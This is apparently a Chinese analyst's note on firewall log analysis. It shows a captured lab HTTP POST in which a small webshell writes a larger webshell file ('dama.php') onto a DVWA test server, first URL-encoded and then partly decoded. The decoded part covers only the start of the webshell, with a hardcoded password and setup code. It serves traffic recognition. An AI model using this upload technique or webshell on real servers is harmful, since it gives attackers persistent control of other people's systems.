最近工作内容是分析防火墙日志,看日志是正确,本地实验小马上传大马 抓取http包如下。可以在分析过程中进行借鉴。
该http请求的行为是通过小马,在小马的当前目录创建一个dama.php的文件,文件内容就是大马的里面的代码。
POST /dvwa/xiaoma.php HTTP/1.1
Host: 192.168.1.109
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:56.0) Gecko/20100101 Firefox/56.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
Content-Length: 219930
Referer: http://192.168.1.109/dvwa/xiaoma.php
Cookie: security=impossible; PHPSESSID=bi5luo0u864miqcqffpgdql0i6
Connection: close
Upgrade-Insecure-Requests: 1 f=C%3A%2Fphpstudy%2FWWW%2Fdvwa%2Fdama.php&c=%3C%3Fphp%0D%0A%24password+%3D+%22admin%21%40%23%22%3B%2F%2Fchange+password+here%0D%0Aerror_reporting%
28E_ERROR%29%3B%0D%0Aset_time_limit%280%29%3B%0D%0A%24lanip+%3D+getenv%28%27REMOTE_ADDR%27%29%3B%0D%0A%0D%0Afunction+Root_GP%28%26%24array%29%0D
%0A%7B%0D%0A%09while%28list%28%24key%2C%24var%29+%3D+each%28%24array%29%29%0D%0A%09%7B%0D%0A%09%09if%28%28strtoupper%28%24key%29+%21%3D+%24key+%7
C%7C+%27%27.intval%28%24key%29+%3D%3D+%22%24key%22%29+%26%26+%24key+%21%3D+%27argc%27+%26%26+%24key+%21%3D+%27argv%27%29%0D%0A%09%09%7B%0D%0A%
09%09%09if%28is_string%28%24var%29%29+%24array%5B%24key%5D+%3D+stripslashes%28%24var%29%3B%0D%0A%09%09%09if%28is_array%28%24var%29%29+%24array%5B
%24key%5D+%3D+Root_GP%28%24var%29%3B++%0D%0A%09%09%7D%0D%0A%09%7D%0D%0A%09return+%24array%3B%0D%0A%7D%0D%0A%0D%0Afunction+Root_CSS%28%29%0D%0A%7B
%0D%0Aprint%3C%3C%3CEND%0D%0A%3Cstyle+type%3D%22text%2Fcss%22%3E%0D%0A%09*%7Bpadding%3A0%3B+margin%3A0%3B%7D%0D%0A%09body%7Bbackground%3Athree
dface%3Bfont-family%3A%22Verdana%22%2C+%22Tahoma%22%2C+sans-serif%3B+font-size%3A13px%3Bmargin-top%3A3px%3Bmargin-bottom%3A3px%3Btable-layout%
3Afixed%3Bword-break%3Abreak-all%3B%7D%0D%0A%09a%7Bcolor%3A%23000000%3Btext-decoration%3Anone%3B%7D%0D%0A%09a%3Ahover%7Bbackground%3A%2333FF33
%3B%7D%0D%0A%09table%7Bcolor%3A%23000000%3Bfont-family%3A%22Verdana%22%2C+%22Tahoma%22%2C+sans-serif%3Bfont-size%3A13px%3Bborder%3A1px+solid+%
23999999%3B%7D%0D%0A%09td%7Bbackground%3A%23F9F6F4%3B%7D%0D%0A++++++++.bt%7Bbackground%3A%233d3d3d%3Bcolor%3A%23ffffff%3Bborder%3A2px%3Bfont%3A13
px+Arial%2CTahoma%3Bheight%3A22px%3B%7D%0D%0A%09.toptd%7Bbackground%3Athreedface%3B+width%3A310px%3B+border-color%3A%23FFFFFF+%23999999+%2399999
9+%23FFFFFF%3B+border-style%3Asolid%3Bborder-width%3A1px%3B%7D%0D%0A%09.msgbox%7Bbackground%3A%23FFFFE0%3Bcolor%3A%23FF0000%3Bheight%3A25px%3Bfo
nt-size%3A12px%3Bborder%3A1px+solid+%23999999%3Btext-align%3Acenter%3Bpadding%3A3px%3Bclear%3Aboth%3B%7D%0D%0A%09.actall%7Bbackground%3A%23F9F6F
4%3Bfont-size%3A14px%3Bborder%3A1px+solid+%23999999%3Bpadding%3A2px
POST数据内容
f=C:/phpstudy/WWW/dvwa/dama.php&c=<?php
$password = "admin!@#";//change password here
error_reporting%
28E_ERROR);
set_time_limit(0);
$lanip = getenv('REMOTE_ADDR'); function Root_GP(&$array) {
while(list($key,$var) = each($array))
{
if((strtoupper($key) != $key %7
C| ''.intval($key) == "$key") && $key != 'argc' && $key != 'argv')
{
%
09 if(is_string($var)) $array[$key] = stripslashes($var);
if(is_array($var)) $array[
$key] = Root_GP($var);
}
}
return $array;
} function Root_CSS()
{ print<<<END
<style type="text/css">
*{padding:0; margin:0;}
body{background:three
dface;font-family:"Verdana", "Tahoma", sans-serif; font-size:13px;margin-top:3px;margin-bottom:3px;table-layout%
3Afixed;word-break:break-all;}
a{color:#000000;text-decoration:none;}
a:hover{background:#33FF33
;}
table{color:#000000;font-family:"Verdana", "Tahoma", sans-serif;font-size:13px;border:1px solid %
23999999;}
td{background:#F9F6F4;}
.bt{background:#3d3d3d;color:#ffffff;border:2px;font:13
px Arial,Tahoma;height:22px;}
.toptd{background:threedface; width:310px; border-color:#FFFFFF #999999 #99999
9 #FFFFFF; border-style:solid;border-width:1px;}
.msgbox{background:#FFFFE0;color:#FF0000;height:25px;fo
nt-size:12px;border:1px solid #999999;text-align:center;padding:3px;clear:both;}
.actall{background:#F9F6F
4;font-size:14px;border:1px solid #999999;padding:2px